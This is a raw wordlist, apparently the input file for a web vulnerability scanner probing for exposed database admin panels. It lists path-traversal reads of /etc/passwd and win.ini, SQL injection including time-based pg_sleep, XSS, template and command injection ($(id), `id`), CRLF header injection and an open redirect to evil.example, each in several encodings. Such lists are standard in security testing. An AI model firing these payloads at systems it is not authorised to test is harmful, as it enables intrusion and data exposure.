/phpmyadmin
/pma
/adminer.php
/adminer
/mongo-express
/dbadmin
/mysql
/db
test
baseline
AUROSE_PROBE
../../../../etc/passwd
..\..\..\..\windows\win.ini
' OR '1'='1
" OR "1"="1
<script>alert(1)</script>
${7*7}
{{7*7}}
`id`
127.0.0.1
http://127.0.0.1
https://example.com
%2Fphpmyadmin
%2Fpma
%2Fadminer.php
%2Fadminer
%2Fmongo-express
%2Fdbadmin
%2Fmysql
%2Fdb
..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%5C..%5C..%5C..%5Cwindows%5Cwin.ini
%27%20OR%20%271%27%3D%271
%22%20OR%20%221%22%3D%221
%3Cscript%3Ealert%281%29%3C%2Fscript%3E
%24%7B7%2A7%7D
%7B%7B7%2A7%7D%7D
%60id%60
http%3A%2F%2F127.0.0.1
https%3A%2F%2Fexample.com
/PHPMYADMIN
/PMA
/ADMINER.PHP
/ADMINER
/MONGO-EXPRESS
/DBADMIN
/MYSQL
/DB
TEST
BASELINE
../../../../ETC/PASSWD
..\..\..\..\WINDOWS\WIN.INI
<SCRIPT>ALERT(1)</SCRIPT>
`ID`
HTTP://127.0.0.1
HTTPS://EXAMPLE.COM
%2FPHPMYADMIN
%2FPMA
%2FADMINER.PHP
%2FADMINER
%2FMONGO-EXPRESS
%2FDBADMIN
%2FMYSQL
%2FDB
..%2F..%2F..%2F..%2FETC%2FPASSWD
..%5C..%5C..%5C..%5CWINDOWS%5CWIN.INI
%3CSCRIPT%3EALERT%281%29%3C%2FSCRIPT%3E
%60ID%60
HTTP%3A%2F%2F127.0.0.1
HTTPS%3A%2F%2FEXAMPLE.COM
' OR '1'%3D'1
" OR "1"%3D"1
/phpmyadmin?v=0
/phpmyadmin&v=0
%2Fphpmyadmin_0
dbexpose_0
/dbexpose/0
/phpmyadmin%0a0
/pma?v=1
/pma&v=1
/phpmyadmin/
%2Fphpmyadmin%2F
%252Fphpmyadmin%252F
/PHPMYADMIN/
/phpmyadmin/?aurose=1
/phpmyadmin/&aurose=1
/phpmyadmin/.bak
/phpmyadmin/.old
%252Fadminer.php
/adminer.php?aurose=1
/adminer.php&aurose=1
/adminer.php.bak
/adminer.php.old
/pma/
%2Fpma%2F
%252Fpma%252F
/PMA/
/pma/?aurose=1
/pma/&aurose=1
/pma/.bak
/pma/.old
/mysql/
%2Fmysql%2F
%252Fmysql%252F
/MYSQL/
/mysql/?aurose=1
/mysql/&aurose=1
/mysql/.bak
/mysql/.old
/dbadmin/
%2Fdbadmin%2F
%252Fdbadmin%252F
/DBADMIN/
/dbadmin/?aurose=1
/dbadmin/&aurose=1
/dbadmin/.bak
/dbadmin/.old
/mongo-express/
%2Fmongo-express%2F
%252Fmongo-express%252F
/MONGO-EXPRESS/
/mongo-express/?aurose=1
/mongo-express/&aurose=1
/mongo-express/.bak
/mongo-express/.old
/pgadmin/
%2Fpgadmin%2F
%252Fpgadmin%252F
/PGADMIN/
/pgadmin/?aurose=1
/pgadmin/&aurose=1
/pgadmin/.bak
/pgadmin/.old
/redis-commander/
%2Fredis-commander%2F
%252Fredis-commander%252F
/REDIS-COMMANDER/
/redis-commander/?aurose=1
/redis-commander/&aurose=1
/redis-commander/.bak
/redis-commander/.old
%2527%2520OR%2520%25271%2527%253D%25271
'/**/OR/**/'1'='1
' OR '1'%3d'1
' OR '1'='1?aurose=1
' OR '1'='1&aurose=1
%2522%2520OR%2520%25221%2522%253D%25221
"/**/OR/**/"1"="1
" OR "1"%3d"1
" OR "1"="1?aurose=1
" OR "1"="1&aurose=1
' AND 1=1 --
%27%20AND%201%3D1%20--
%2527%2520AND%25201%253D1%2520--
'/**/AND/**/1=1/**/--
' AND 1%3d1 --
' AND 1=1 --?aurose=1
' AND 1=1 --&aurose=1
' AND 1=2 --
%27%20AND%201%3D2%20--
%2527%2520AND%25201%253D2%2520--
'/**/AND/**/1=2/**/--
' AND 1%3d2 --
' AND 1=2 --?aurose=1
' AND 1=2 --&aurose=1
..%252F..%252F..%252F..%252Fetc%252Fpasswd
../../../../etc/passwd?aurose=1
../../../../etc/passwd&aurose=1
..%255C..%255C..%255C..%255Cwindows%255Cwin.ini
..\..\..\..\windows\win.ini?aurose=1
..\..\..\..\windows\win.ini&aurose=1
%2524%257B7%252A7%257D
${7*7}?aurose=1
${7*7}&aurose=1
%257B%257B7%252A7%257D%257D
{{7*7}}?aurose=1
{{7*7}}&aurose=1
<script>alert(document.domain)</script>
%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
%253Cscript%253Ealert%2528document.domain%2529%253C%252Fscript%253E
<SCRIPT>ALERT(DOCUMENT.DOMAIN)</SCRIPT>
<script>alert(document.domain)</script>?aurose=1
<script>alert(document.domain)</script>&aurose=1
';SELECT pg_sleep(2)--
%27%3BSELECT%20pg_sleep%282%29--
%2527%253BSELECT%2520pg_sleep%25282%2529--
';SELECT/**/pg_sleep(2)--
';SELECT PG_SLEEP(2)--
';SELECT pg_sleep(2)--?aurose=1
';SELECT pg_sleep(2)--&aurose=1
%2560id%2560
`id`?aurose=1
`id`&aurose=1
$(id)
%24%28id%29
%2524%2528id%2529
$(ID)
$(id)?aurose=1
$(id)&aurose=1
${IFS}
%24%7BIFS%7D
%2524%257BIFS%257D
${IFS}?aurose=1
${IFS}&aurose=1
%0d%0aX-Aurose: 1
%250d%250aX-Aurose%3A%201
%25250d%25250aX-Aurose%253A%25201
%0d%0aX-Aurose:/**/1
%0D%0AX-AUROSE: 1
%0d%0aX-Aurose: 1?aurose=1
%0d%0aX-Aurose: 1&aurose=1
https://example.com/?next=https://evil.example
https%3A%2F%2Fexample.com%2F%3Fnext%3Dhttps%3A%2F%2Fevil.example
https%253A%252F%252Fexample.com%252F%253Fnext%253Dhttps%253A%252F%252Fevil.example
https://example.com/?next%3dhttps://evil.example
HTTPS://EXAMPLE.COM/?NEXT=HTTPS://EVIL.EXAMPLE
https://example.com/?next=https://evil.example?aurose=1
https://example.com/?next=https://evil.example&aurose=1
/phpmyadmin/::var0
%2Fphpmyadmin%2F::v0
/dbexpose/probe/0
/adminer.php::var1
%2Fadminer.php::v1
/dbexpose/probe/1
/pma/::var2
%2Fpma%2F::v2
/dbexpose/probe/2
/mysql/::var3
%2Fmysql%2F::v3
/dbexpose/probe/3
/dbadmin/::var4
%2Fdbadmin%2F::v4
/dbexpose/probe/4
/mongo-express/::var5
%2Fmongo-express%2F::v5
/dbexpose/probe/5
/pgadmin/::var6
%2Fpgadmin%2F::v6
/dbexpose/probe/6
/redis-commander/::var7
%2Fredis-commander%2F::v7
/dbexpose/probe/7
